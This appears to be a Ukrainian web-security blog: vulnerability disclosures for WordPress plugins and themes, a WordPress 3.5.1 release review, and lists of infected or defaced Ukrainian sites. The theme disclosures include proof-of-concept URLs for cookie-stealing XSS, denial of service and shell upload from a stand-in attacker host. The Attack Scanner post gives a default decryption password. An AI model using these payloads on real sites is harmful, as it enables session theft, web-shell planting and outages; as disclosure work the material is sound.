Websecurity - Веб безпека

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Sahifa, Shopping Cart та ReFlex Gallery. Для котрих з’явилися експлоіти. Sahifa - це тема движка, Shopping Cart - це плагін для створення онлайн-магазину, ReFlex Gallery - це плагін для створення галерей зображень.

• WordPress Sahifa 2.4.0 Cross Site Request Forgery / Path Disclosure (деталі)
• WordPress Shopping Cart 8.1.14 Shell Upload / SQL Injection (деталі)
• WordPress ReFlex Gallery 1.3 Shell Upload (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

29.10.2012

У жовтні, 07.10.2012, я виявив Information Leakage уразливості в плагіні WordPress Attack Scanner для WordPress. Дірки виявив у версії Free, але версія Pro також повинна бути уразливою. Про що найближчим часом повідомлю розробникам веб додатку.

Стосовно плагінів для WordPress раніше я писав про уразливості в Wordfence Security.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

29.01.2013

Information Leakage (WASC-13):

http://site/wp-content/plugins/path/data.txt
http://site/wp-content/plugins/path/archive.txt

Папка “path” може бути WP-Attack-Scanner або WP-Attack-Scanner-Free.

Вільний доступ до даних - їх можна прочитати в браузері без авторизації. Хоча дані зашифровані, але по замовчуванню пароль changepassword. Якщо пароль не був змінений, то дані легко розшифровуються, якщо ж змінений, то його можна підібрати.

Уразливі всі версії WordPress Attack Scanner, як безкоштовна, так і платна. Перевірялося на версії 0.9.5.beta.

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://tyachiv-rda.gov.ua - інфікований державний сайт - інфекція була виявлена 20.12.2012. Зараз сайт входить до переліку підозрілих.
• http://summit.dp.ua - інфекція була виявлена 22.01.2013. Зараз сайт не входить до переліку підозрілих.
• http://photo-portal.in.ua - інфекція була виявлена 22.01.2013. Зараз сайт входить до переліку підозрілих.
• http://tire.ua - інфекція була виявлена 20.11.2012. Зараз сайт не входить до переліку підозрілих.
• http://jettec-mrm.com.ua - інфекція була виявлена 01.12.2012. Зараз сайт не входить до переліку підозрілих.

В січні, 24.01.2013, вийшла нова версія WordPress 3.5.1.

WordPress 3.5.1 це секюріті та багфікс випуск нової 3.5 серії. В якому розробники виправили декілька уразливостей і 37 багів. Причому до багів віднесли FPD, що виникали при некоректній роботі плагінів. Полюбляють вони відносити дірки до багів, особливо FPD, і не перераховувати їх в списку виправлених уразливостей (тим самим штучно зменшуючи їх кількість, не кажучи вже про часте приховане виправлення уразливостей).

А також був виявлений баг з WP на IIS, який не допускає оновлення з версії 3.5 на 3.5.1. В цьому випадку розробники створили інструкції по проведенню оновлення WordPress на веб сервері IIS.

Стосовно покращення безпеки, то були виправлені наступні уразливості: server-side request forgery та remote port scanning через XML-RPC (використовуючи пінгбеки), 2 Cross-Site Scripting дірки в ядрі движка та 1 XSS в сторонній бібліотеці Plupload, що постачається з движком. З WP 3.5.1 постачається нова виправлена версія Plupload.

Якщо ці дві дірки в XML-RPC вони виправили, то Brute Force дірку, про яку я писав ще рік тому, вони так до цих пір виправити не спромоглися. І враховуючи, що після відключення по дефолту XML-RPC в WP 2.6, вони його включили по дефолту в версії 3.5, то це повернуло BF через XML-RPC в маси.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Asset-Manager, Photo Plus / Photo Search та SB Uploader. Для котрих з’явилися експлоіти. Asset-Manager - це плагін для управління документами і контролю версій, Photo Plus / Photo Search - це плагіни для роботи з фотографіями, SB Uploader - це плагін для завантаження зображень на сайт.

• WordPress Asset-Manager PHP File Upload (деталі)
• WordPress Photo Plus / Photo Search XSS / CSRF (деталі)
• WordPress SB Uploader 3.9 Shell Upload (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Вчора я знайшов Cross-Site Scripting, Full path disclosure, Abuse of Functionality, Denial of Service та Arbitrary File Upload уразливості в темі Chocolate WP для WordPress. Про що вже повідомив розробникам.

XSS (WASC-08) (в старих версіях TimThumb):

http://site/wp-content/themes/dt-chocolate/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg

Full path disclosure (WASC-13):

http://site/wp-content/themes/dt-chocolate/thumb.php?src=%3C111
http://site/wp-content/themes/dt-chocolate/thumb.php?src=http://site/page.png&h=1&w=1111111
http://site/wp-content/themes/dt-chocolate/thumb.php?src=http://site/page.png&h=1111111&w=1

Abuse of Functionality (WASC-42):

http://site/wp-content/themes/dt-chocolate/thumb.php?src=http://site&h=1&w=1
http://site/wp-content/themes/dt-chocolate/thumb.php?src=http://site.badsite.com&h=1&w=1 (обхід обмежень на домен, якщо таке обмеження включене)

DoS (WASC-10):

http://site/wp-content/themes/dt-chocolate/thumb.php?src=http://site/big_file&h=1&w=1
http://site/wp-content/themes/dt-chocolate/thumb.php?src=http://site.badsite.com/big_file&h=1&w=1 (обхід обмежень на домен, якщо таке обмеження включене)

Arbitrary File Upload (WASC-31):

http://site/wp-content/themes/dt-chocolate/thumb.php?src=http://site.badsite.com/shell.php

Full path disclosure (WASC-13):

http://site/wp-content/themes/dt-chocolate/

Окрім index.php також можливі FPD в інших php-файлах в цій темі.

Уразливі всі версії теми Chocolate WP для WordPress.

Серед різних секюріті плагінів для WordPress, про деякі з них я вже розповідав, як то Wordfence, існує такий плагін як Cloudsafe365.

Раніше я вже писав про уразливість в Cloudsafe365.

Сам плагін Cloudsafe365 для WordPress є безкоштовним. Але є додаткові функції, які можна придбати на офіційному сайті. Для цього на сайті http://www.cloudsafe365.com потрібно підписатися на платну версію. Всього існує дві платні версії: Plus і Pro, що включають всі можливості Basic версії та багато інших функцій (при цьому версія Pro знаходиться в розробці й лише анонсована на сайті, доступною вона стане пізніше).

Cloudsafe365 представляє собою хмарний сервіс, реалізований у вигляді плагіна для WP. Він має чимало можливостей (особливо в платній версії), з яких виділю головні.

• Автоматичний бекап сайта.
• Захист від багатьох уразливостей.
• Захист контенту (щоб його було важче вкрасти, але це не захистить повністю, лише від автоматизованого копіювання контенту з сайта).
• Антивірусний сканер (сканування malware на сайтах).
• Моніторинг в реальному часі.

По наявності функції сканування malware на сайтах цей сервіс є безпосереднім конкурентом моїй Web VDS. По функції захисту від атак та уразливостей він подібний до вищезгаданого Wordfence та багатьох інших плагінів до WP, про які я вже писав.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Myflash, Clockstone та WP Property. Для котрих з’явилися експлоіти. Myflash - це плагін для створення слайдшоу з флешек, Clockstone - це тема движка, WP Property - це плагін для управління списками майна та нерухомості.

• WordPress Myflash Local File Inclusion (деталі)
• WordPress Clockstone Theme File Upload (деталі)
• WordPress WP-Property PHP File Upload (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://sumy-g.upszn-sumy.gov.ua (хакером hatrk) - 11.09.2012 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://bogodukhivrda.gov.ua (хакером DR-MTMRD) - 18.10.2012 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://vinjust.gov.ua (хакером Nob0dy) - 22.10.2012 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://www.formulove.com.ua (хакером Badi) - 12.01.2013, зараз сайт вже виправлений адмінами
• http://ufb.org.ua (хакером Badi) - 12.01.2013, зараз сайт вже виправлений адмінами

У січні, 13.01.2013, я знайшов Information Leakage, Cross-Site Scripting, Full path disclosure, Abuse of Functionality, Denial of Service та Arbitrary File Upload уразливості в темі Daily Edition Mouss для WordPress.

Раніше була оприлюднена SQL Injection уразливість в Daily Edition Mouss. В якій я знайшов багато нових дірок. Схоже, що це тема Daily Edition від WooThemes, про дірки в якій я писав в 2011 році. Тому окрім SQL injection, в цій темі багато інших уразливостей.

Information Leakage (SQL DB Structure Extraction) (WASC-13):

http://site/wp-content/themes/dailyedition-mouss/fiche-disque.php

XSS (WASC-08):

http://site/wp-content/themes/dailyedition-mouss/fiche-disque.php?id=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Full path disclosure (WASC-13):

http://site/wp-content/themes/dailyedition-mouss/

Окрім index.php також можливі FPD в інших php-файлах в цій темі.

XSS (WASC-08):

http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=1%3Cbody%20onload=alert(document.cookie)%3E.jpg

Full path disclosure (WASC-13):

http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://
http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://site/page.png&h=1&w=1111111
http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://site/page.png&h=1111111&w=1

Abuse of Functionality (WASC-42):

http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://site&h=1&w=1
http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://site.flickr.com&h=1&w=1 (обхід обмежень на домен, якщо таке обмеження включене)

DoS (WASC-10):

http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://site/big_file&h=1&w=1
http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://site.flickr.com/big_file&h=1&w=1 (обхід обмежень на домен, якщо таке обмеження включене)

Arbitrary File Upload (WASC-31):

http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://flickr.com.site.com/shell.php

AoF, DoS, AFU уразливості не працюють в останній версії теми (в якій я тестував їх). Це може бути в зв’язку з захистом від AFU дірки в TimThumb. Але вони повинні працювати в ранніх версіях цієї теми.

Уразливі всі версії теми Daily Edition Mouss для WordPress.